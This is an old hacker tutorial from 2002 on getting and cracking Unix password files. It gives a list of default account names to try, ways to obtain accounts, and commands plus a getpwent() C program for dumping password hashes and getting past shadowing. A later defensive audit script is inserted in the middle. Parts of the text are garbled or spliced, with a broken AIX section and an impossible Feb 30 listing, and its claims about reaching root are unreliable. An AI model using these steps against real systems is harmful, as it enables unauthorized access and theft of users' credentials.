How To Get The Passwd File in Unix


WHAT'S THE passwd?

'passwd' is the common name of the file in which user account information is stored on a UNIX system. You might consider it a comprehensive users list. The file contains the information for an account's USERNAME, PASSWORD, USER NUMBER, GROUP, GECOS, HOME DIRECTORY, and SHELL. A single entry of a passwd file might look like this:


bhaze:8d34jSks73hsb:36:15:Black Haze:/usr/kusers/staff/bhaze:/kusr/bin/bhz

USERNAME           bhaze
PASSWORD           8d34jSks73hsb
USER NUMBER        36
GROUP NUMBER       15
GECOS INFORMATION  Black Haze
HOME DIRECTORY     /usr/kusers/staff/bhaze
SHELL              /kusr/bin/bhz


Okay, now take a look at the password entry: 8d34jSks73hsb
This is in fact NOT the password; the security system would have to have been written by a total lamer if it were. Instead it is an encrypted equivalent of the real password. As a part of the UNIX account registration process, when a user changes his password UNIX takes the password and encrypts it using an algorithm hackers have known for some time. If a user has an account he has axs to the 'passwd' file in order to log in. But anyone else who has axs to the 'passwd' file can also look at everybody else's password. So in order for UNIX to have a tighter security system it encrypts the password so that no one can look at other userz passwords.

             encrypted equivalent of real password
            /
bhaze:8d34jSks73hsb:36:15:Black Haze:/usr/kusers/staff/bhaze:/usr/bin/bhz

...you can many of the quadzillion UNIX password hackerz which decrypt the pas for you in order to log in.
Ok, at this point you should be ready to try and find a UNIX 'passwd' file to crack, right? Wrong. You still have a couple of minor, requisite tasks to perform. First, (obviously) you'll need to find a UNIX to hack. In most cases, you've already got one in mind, but just in case you don't we'll take a look at a few. Also, once you've found a UNIX to hack, you'll need an account on that UNIX. There's no way to steal the 'passwd' file from a UNIX without first having an account on it (not true, you can always get a 'passwd' file from someone else, but ignore this because I'm contradicting myself). Once you've accomplished your requisites you can start trying to steal the 'passwd' file.

Step 1. Finding a UNIX to Hack
Here's what a common UNIX login screen looks like:

Ultrx v4.3 (rev .44)
1 : Login to Arthur (Kingswood)
2 : Login to Guinevere (Kingswood)
3 : Login to Wizard (Westmead)
4 : Resume Session
5 : Exit System

V.32HS1 :
login:
Other UNIX machines are: System V, BSD, Xenix, and AIX. Look for these names to be somewhere in the login screen. Knowing what type of UNIX you're using will aid you in hacking it.

Step 2. An account to start with
If you already have a UNIX account go to Step 3. If you do not already have an account, you need to get one. Either: trade for one, trash for one, get a legitimate one, or hack one out by hand. The first three options are probably the easiest. You can trade for UNIX accounts on IRC channels #hack or #phreak. You can trash for accounts in dumpsters and trashcans at most Colleges or Universities. You can buy accounts from any one of the increasing number of Internet Service Providers (they almost all use UNIX). But, of course, as we all know, you're a hacker, and the only thing you wanna do is hack an account. So be it. Here's a list of UNIX defaults.
Note: These are some of the default passwords which come on a UNIX system. And it's common that dumb System Managers at Uni's forget to delete most of the default accounts to gain axs. And if you're lucky it's possible some of them may work.

root bin adm
makefsys sysadm sys
mountfsys rje sync
umountfsys tty nobody
checkfsys somebody setup
lp powerdown ingres
dptp general guest
daemon gsa user
trouble games help
nuucp public unix
uucp test admin
student standard pub
field demo batch
visitor listen network
uuhelp usenet sysinfo
cron console sysbin
who root2 startup
shutdown ncrm new


Once you have a working UNIX account you can now attempt to steal the passwd file. It can be extremely difficult to 'steal' the passwords of users, as they can be protected from others in numerous ways. We will discuss some of the common ways to get the passwd file.
This is probably THE easiest and most common UNIX hack. Log in to your account and try typing this at the prompt:

gwen> cat /etc/passwd

gwen>     prompt
cat       concatenate
/etc      directory
passwd    filename


'cat' is short for concatenate, a command used for reading and displaying files in standard output. '/etc' is the common directory for the password file on older UNIXes. 'passwd' is the common password filename on UNIXes. If you entered: cat /etc/passwd and got a listing that looks like this (abbreviated):

bhaze:IS3fhZdWX3JGU:2162:15:Ken Bahadur:/kuser/staff/bhaze:/kusr/bin/bhz
            \
             password intact

...then k-rad! You've successfully listed out (stolen) your first 'passwd' file. *Buffer* the entire contents to a text file, then kraq away......
If you got a listing that looks like this:

       password tokenized
      /
jakef:x:263:200:Jack Harmon:/usr/users/intruder:/bin/csh

or:

egghead:PASSWORD HERE:2183:129:Novel,,,:/usr/users/advisor/esvogt:/usr/bin/ksh
             \
              password removed

or you got:

cat: cannot open /etc/passwd

Then the UNIX you are on is utilizing some other form of protection or may be using a different 'passwd'-ing process. Keep reading.

-AIX-
On AIX systems, a UNIX variation, the 'passwd' file is in a different
"NIS (Network Information System) is the current name for what was once known as yp (Yellow Pages). The purpose for NIS is to allow many machines on a network to share configuration information, including password data. NIS IS NOT DESIGNED TO PROMOTE SYSTEM SECURITY. If your system uses NIS you will have a very short /etc/passwd file that includes a line that looks like this:

+::0:0:::

"To view the real password type this command:"

gwen> ypcat passwd

If 'ypcat' lists a password file with the (encrypted) password still intact, copy the contents and launch a half decent UNIX proggy

If you still can't get the passwd file then chances are the host you are using might be a little too hard 2 kraq. If so try another service provider.

<> Password Shadowing <>

If you're trying to kraq yourself a passwd file in UNIX with no success it is possible that the system shadows the password. Password shadowing is a security system where the encrypted password field of /etc/passwd is replaced with a special token and the encrypted real password is stored in a separate file which is not readable by normal system users.
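
The password-field cases shown earlier (hash intact, 'x' token, NIS '+' entry) and the rule that the shadow file must not be readable by normal users can be checked from the administrator's side. The following is an added example, not part of the original text: the function names are hypothetical, the '*' and '!' lock markers are an assumption about the local system, and the guest and daemon sample lines are constructed.

```sh
#!/bin/sh
# Added example (not from the original page): audit passwd-format data for
# the password-field cases the page walks through.

# classify_pw_fields FILE   (use "-" to read stdin)
# Prints "name:STATUS" for every entry.
classify_pw_fields() {
    awk -F: '
        /^#/ || NF == 0 { next }                            # comments, blanks
        /^[+-]/         { print $1 ":NIS_INCLUDE"; next }   # e.g. +::0:0:::
        NF < 7          { print $1 ":MALFORMED"; next }
        $2 == ""        { print $1 ":EMPTY_PASSWORD"; next }
        $2 == "x"       { print $1 ":SHADOWED"; next }      # token, hash elsewhere
        $2 ~ /^[*!]/    { print $1 ":LOCKED"; next }        # assumed lock markers
                        { print $1 ":HASH_EXPOSED" }        # readable by any user
    ' "$1"
}

# audit_passwd FILE: list risky entries; return status 1 if any were found.
audit_passwd() {
    findings=$(classify_pw_fields "$1" |
               grep -E ':(HASH_EXPOSED|EMPTY_PASSWORD)$' || true)
    [ -z "$findings" ] && return 0
    printf '%s\n' "$findings"
    return 1
}

# world_readable FILE: true if "other" has read permission (bad for a shadow file).
world_readable() {
    [ -n "$(find "$1" -prune -perm -004 -print 2>/dev/null)" ]
}

# Constructed sample: the first three lines are formats shown on this page,
# the guest and daemon lines are made up for the example.
sample_passwd() {
    cat <<'EOF'
bhaze:IS3fhZdWX3JGU:2162:15:Ken Bahadur:/kuser/staff/bhaze:/kusr/bin/bhz
jakef:x:263:200:Jack Harmon:/usr/users/intruder:/bin/csh
+::0:0:::
guest::500:100:Guest:/home/guest:/bin/sh
daemon:*:1:1:daemon:/:/bin/false
EOF
}

tmp=$(mktemp)
sample_passwd > "$tmp"
classify_pw_fields "$tmp"
rm -f "$tmp"
```

On a live system, `getent passwd | classify_pw_fields -` audits the same database view that getpwent() returns, and `world_readable /etc/shadow` should come back false.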

To defeat password shadowing on many systems (though not all) use the code below, which uses successive calls to getpwent() to obtain the password file. This works on most systems and the chance of it working is quite high, but if it doesn't, chances are the system is pretty secure and you will have a real hard time trying to kraq the system.


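#include <stdio.h>
#include <pwd.h>

int main(void)
{
    struct passwd *p;

    /* Walk the password database one entry at a time. */
    while ((p = getpwent()) != NULL)
        printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
               (int)p->pw_uid, (int)p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);

    endpwent();   /* close the database */
    return 0;
}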


If you're unfamiliar with UNIX scripts, it's a pretty kool idea not to get axs til' you at least know what you're doing. But if you do, read on..
First copy the above script into a text file and save it as 'axs.c'. Next log in to your UNIX account and create a directory called 'executables'. (At the prompt) Type:

gwen> mkdir executables

gwen>        prompt
mkdir        make directory
executables  directory name

You can either u/l your script via UNIX by:
rz axs.c
which will u/l the file in the current dir, or, if you prefer, use Fetch or some other FTP client: FTP into your dir and upload 'axs.c' into the directory 'executables'. Once you've done this, log in to your account and go to the 'executables' directory.
Type 'ls' to list the directory to make sure the file is there.

gwen> cd executables

If it is, you can attempt to compile the 'axs.c' script. Almost all UNIX systems have compilers, it's just a matter of whether or not you have access TO a compiler. Typically you do. At the UNIX prompt type:

gwen> cc -o a.out axs.c

cc       compiler
-o       output option
a.out    executable
axs.c    filename

If you don't get an error you should be left with a file named 'a.out'. Type:

gwen> a.out

If you get a listing with the (encrypted) passwordz intact, kewl *buffer* the contents to a text file and go kraqn'. If not, keep readin

If you got an error when you tried to compile the 'axs.c' script: 'cc: Command not found' then you either don't have that compiler or you don't have access to it. In either case, try compiling with the GNU C Compiler:

gwen> gcc axs.c

gcc      gnu c compiler
axs.c    filename

Again, you should be left with a file named 'a.out'. At the UNIX prompt type: a.out. If you get a password file with the (encrypted) password file intact, *buffer* em. Mad, now use your fav UNIX kraqr proggy and kraq away!

After you have got your unfortunate userz passwd you will be greeted with root at his dir!
total 307
drwxr-xr-x 3 alf 512 Feb 29 22:12 .
drwxr-xr-x 2025 root 36352 Feb 30 09:03 ..
-rw-r--r-- 1 alf 0 Feb 27 13:32 .addressbook
-rw-r--r-- 1 alf 29 Feb 17 1996 .bash_login
-rw-r--r-- 1 alf 25 Feb 17 1996 .bashrc
-rw-r--r-- 1 alf 24 Feb 17 1996 .cshrc
-rw-r--r-- 1 alf 320 Feb 29 22:13 .history
-rw------- 1 alf 0 Feb 28 21:09 .ircmotd
-rw-r--r-- 1 alf 24 Mar 8 1996 .login
-rw------- 1 alf 22925 Feb 27 13:33 .pine-interrupted-mail
-rw-r--r-- 1 alf 5433 Feb 29 22:12 .pinerc
-rwxr-xr-x 1 alf 21 Feb 17 1996 .profile
drwx------ 2 alf 512 Mar 8 21:11 mail
-rw-r--r-- 1 alf 221435 feb 26 21:05 textbox.irc
%


- = - = - = - = - = - = - = - = - = - = - = - = - = - == -
StopWar
Contact information:
Email - MohamadAzmie@Hotmail.Com
Http:// - MasterZCrew.Cjb.Net & HackerMasterZ.Cjb.Net
- = - = - = - = - = - = - = - = - = - == - = - = - = - = -
Copyrighted (C) 2002 by StopWar  All rights Reserved MasterZCrew, Inc.
